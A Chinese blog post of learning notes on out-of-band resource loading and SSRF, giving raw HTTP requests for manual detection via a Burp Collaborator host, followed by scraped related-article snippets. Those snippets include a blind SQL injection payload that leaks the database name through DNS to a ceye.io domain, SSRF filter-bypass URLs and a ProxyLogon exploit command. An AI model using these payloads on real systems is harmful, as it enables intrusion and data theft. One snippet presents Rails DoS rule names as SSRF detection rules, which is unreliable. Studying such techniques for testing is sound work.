Out-of-band resource load及SSRF外部服务交互攻击

最新推荐文章于 2024-07-14 15:45:30 发布
最新推荐文章于 2024-07-14 15:45:30 发布
阅读量5.4k 收藏 1
点赞数
分类专栏: 安全性测试

Out-of-band resource load(远程文件包含/带外资源加载)及SSRF外部服务交互攻击

 

渗透测试过程中遇到的一处OBR,站在大佬的肩膀上学习了。本文精简了最基本的远程文件包含(out-of-band resource load)和SSRF(外部服务交互攻击)的原理,通过学习51上blacksunny的一篇相关文章,加入了一些自己的理解,适当整理,这算是一篇学习记录。主要介绍了远程文件包含(out-of-band resource load)和SSRF(外部服务交互攻击)的原理及基本检测方法。

Out-of-band resource load发生的情况是将payload发送到目标应用上面导致目标先尝试通过一个域名获取内容,然后将获取到的内容整合到原始的返回数据之中。

burp v1.6.15往上的版本都有Burp Collaborato模块,此模块的其中一个检测点就是OBR,检测时需要与架在互联网的Burp Collaborato服务器交互判断。主动扫描可检测。

 

手动检测需要配置一个公网服务器,并且接收OBR传输特征并应答一段确认报文,检测端收到最终回传的来自OBR服务器的报文即攻击成功。从而达到了控制target服务器请求自定义的恶意服务器的动作。

服务器架构如下:

OBR手工检测方法:

[cc lang=txt]GET http://66ados96tkyx6mgii6irshwd248uwm0aqxgl5.burpcollaborator.net/ HTTP/1.1
Host: TARGETHOST
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close [/cc] 或者 target设为TARGETHOST(在burp中测试的话)[cc lang=txt]GET / HTTP/1.1
Host: http://66ados96tkyx6mgii6irshwd248uwm0aqxgl5.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close [/cc]

#SSRF与OBR很像,通过控制target访问其他网站,间接与第三方网站通信。相当于target做傀儡代理请求,因此增大了内网攻击面。

SSRF的手工检测方法:

[cc lang=txt]GET http://baidu.com HTTP/1.1
Host: TARGETHOST
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close [/cc]

SSRF因此与不限制源的漏洞。

#关于带内及带外区别:

通过信道区分的话,内带只有一条信道,而外带不止一条。

参考资料:

blacksunny的文章:https://www.cnblogs.com/blacksunny/p/8005053.html

官方文档:https://portswigger.net/burp/

一杯咖啡的时间
关注
专栏目录
MySQL Out-of-Band 攻击
m0_57307920的博客
11-06 225
正如你之前看到的,’load_file’和’into outfile / dumpfile’在Windows下的UNC路径下运行正常,可以用于解析一个不存在的路径,当DNS失败时,请求将作为LLMNR发送、NetBIOS- NS查询。’load_file’方法可以用于基于union的注入和基于报错的注入。不使用or,可以使用 ||, |, and, &&, &, >>,
out-of-band
u014211079的专栏
05-04 1776
在传输层,当连接的一端有很重要的情况发生时,wf
数据库out_of_band攻击【原理分析、复现】
Sp4rkW的博客
01-18 9794
这个问题已经是去年提出的了,之前也看到过,在CTF题目环境中利用过却对原理不慎了解,在公司大佬们的帮助下成功了理解了一波原理。这里对原理进行一波总结,并利用了CEYE平台成功的进行了原理复现利用。 博客原文地址:http://blog.csdn.net/wy_97/article/details/79094001 原理分析 这个虽然是利用到了比如说mysql的LOAD_FILE函数,其实...
SSRF(一):PortSwigger靶场笔记
最新发布
aaaadoga的博客
07-14 847
该文章是关于作者在PortSwigger的SSRF靶场训练的记录和学习笔记
外部接口交互
bitter_sweet的专栏
12-18 421
1 存储的字段会不会超过双方数据库的限制 2 签名计算的规则(顺序,null处理) 3 特殊字符的规定(避免被对方转义) 4 返回格式的规定(最好是无论怎么样都返回相同的格式。无论成功失败。)
插件分享 | 来检测带外(Out-of-Band)流量的Ceye
m0_46699477的博客
03-22 5200
它的使用场景主要是在一些不能直接表明攻击是否成功的漏洞利用的过程中,通过使用 CEYE 平台提供的域名,结合诸如 DNS、HTTP 之类的带外信道来得到我们想要的回显信息,从而达到对漏洞的检测。
关于External service interaction (DNS)漏洞的思考
sechelper的博客
02-11 556
关于External service interaction (DNS)漏洞的思考
Lab: Blind XXE with out-of-band interaction | Lab: Blind XXE with out-of-band interaction via XML pa...
Zeker62的博客
08-26 337
什么是盲XXE? 当应用程序容易受到XXE 注入但不返回其响应中任何定义的外部实体的值时,就会出现盲 XXE 漏洞。这意味着直接检索服务器端文件是不可能的,因此盲 XXE 通常比常规 XXE 漏洞更难被利用。 有两种广泛的方法可以找到和利用盲 XXE 漏洞: 您可以触发带外网络交互,有时会在交互数据中泄露敏感数据。 您可以通过错误消息包含敏感数据的方式触发 XML 解析错误。 使用带外 ( OA...
ssrf-req-filter:在 NodeJS 中发送请求时防止 SSRF 的模块。 阻止对本地和私有 IP 地址的请求
05-31
ssrf-req-filter - 防止 SSRF 攻击 :shield: 服务器端请求伪造 (SSRF) SSRF 是一种攻击媒介,它滥用应用程序与内部/外部网络或机器本身进行交互。 此向量的促成因素之一是 URL 处理不当。 安装 npm install ssrf-...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
ProxyLogon:ProxyLogon(CVE-2021-26855 + CVE-2021-27065)Exchange Server RCE(SSRF-> GetWebShell)
03-25
ProxyLogon(CVE-2021-26855 + CVE-2021-27065)Exchange Server RCE(SSRF-> GetWebShell) usage : python ProxyLogon . py - - host = exchange . com - - mail = admin @ exchange . com python ProxyLogon ...
ssrfpll.rar_DQ 锁相环_SSRF-PLL_同步锁相环_锁相环_锁相环 同步
07-14
基于同步坐标系的自建锁相环模块仿真,dq坐标系与matlab自带模块相差90度,新建的dq坐标系是符合中式习惯坐标系
External service interaction (DNS)-漏洞 解决方案
热门推荐
一杯咖啡的渗透记忆
08-14 1万+
External service interaction (DNS):外部服务交互漏洞。 通过这个API可以直接输出request的网址的IP地址。这个可以进行跳板式的危险访问。 解决方案: 更改系统的防火墙访问地址的白名单,只有授权的端口或地址才能访问。 或者设置入站的IP地址,禁止设置全网访问策略。 ...
out-of-band data 带外数据
u010154760的专栏
03-26 2496
带外数据(out—of—band   data),有时也称为加速数据(expedited   data),      是指连接双方中的一方发生重要事情,想要迅速地通知对方。      这种通知在已经排队等待发送的任何“普通”(有时称为“带内”)数据之前发送。      带外数据设计为比普通数据有更高的优先级。      带外数据是映射到现有的连接中的,而不是在客户机和服务器间再用一个连接。
Out of Band SQL盲注
薄炙厚词的博客
02-14 1650
SQL盲注 使用http://ceye.io/DNSlog获取dns记录 获取自己的Identifier xxxxxx.ceye.io 搭建环境 Windows server 2003 +phpstudy+sqli-labs Payload: and%20load_file(concat(%27\\\\%27,(select database()),%27.xxxxxx.c...
CVE-2022-26809:Windows 远程代码执行漏洞,约72万台服务器端口暴露外网
anquanjishu的博客
04-15 1913
微软上周修复了一个Windows RPC CVE-2022-26809 漏洞,并将其评为「严重」级别,无需身份认证和用户交互,仅通过向受影响的目标服务器发送特制的RPC请求,即可触发并达到远程代码执行的目的。 受影响范围 从上表中可以看出来,此漏洞利用无需要交互。基本上暴露了445端口且运行了Windows RPC未安装补丁的Windows 服务器都容易受到攻击。据Shodan统计称,网上暴露445端口的服务器超过70万台,如图所示: 漏洞详情: 漏洞位于Win...
API接口漏洞利用及防御
Z__7Gk的博客
07-27 1525
API(Application Programming Interface,应用程序编程接口)是不同软件系统之间进行数据交互和通信的一种方式。API接口漏洞指的是在API的设计、开发或实现过程中存在的安全漏洞,可能导致恶意攻击者利用这些漏洞来获取未授权的访问、篡改数据、拒绝服务等恶意行为。
常见安全漏洞及整改建议
weixin_30708329的博客
03-17 1836
引用:http://www.shangxueba.com/jingyan/1603262.html 1. HTML表单没有CSRF保护 1.1 问题描述: CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 CSRF攻击攻击者...
ssrf学习笔记
qq_46804551的博客
10-12 660
什么地方最容易出现ssrf 云服务器商.(各种网站数据库操作) 有远程图片加载的地方。(编辑器之类的有远程图片加载) 网站采集、网页抓取的地方.(很多网站会有新闻采集输入url然后一键采集) 头像的地方。(某易就是喜欢远程加载头像,例如:http://xx.com/image?url=http://1.jpg) 最后一个切要输入网址的地方和可以输入IP的地方,都是ssrf的天下。 ...
Suricata的官方规则库emerging-all.rules有哪些ssrf的攻击检测规则呢
05-25
Suricata的官方规则库emerging-all.rules中包含了许多SSRF攻击的检测规则,其中一些比较常见的规则包括: 1. ET WEB_SERVER Possible Ruby on Rails XML Parameter Parsing DoS Attempt 2. ET WEB_SERVER Possible Ruby on Rails JSON Parameter Parsing DoS Attempt 3. ET WEB_SERVER Possible Ruby on Rails YAML Parameter Parsing DoS Attempt 4. ET WEB_SERVER Possible Ruby on Rails Parameter Parsing DoS Attempt 5. ET WEB_SERVER Possible Ruby on Rails Parameter Parsing DoS Attempt (CVE-2013-0156) 6. ET WEB_SERVER Possible Ruby on Rails Parameter Parsing DoS Attempt (CVE-2013-0155) 7. ET WEB_SERVER Possible Ruby on Rails Parameter Parsing DoS Attempt (CVE-2013-0154) 8. ET WEB_SERVER Possible Ruby on Rails Parameter Parsing DoS Attempt (CVE-2013-0153) 这些规则主要用于检测Ruby on Rails框架中的SSRF漏洞,可以有效地防止攻击者利用该漏洞进行攻击。同时,Suricata还包含了其他的SSRF攻击检测规则,可以根据具体情况进行选择和配置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值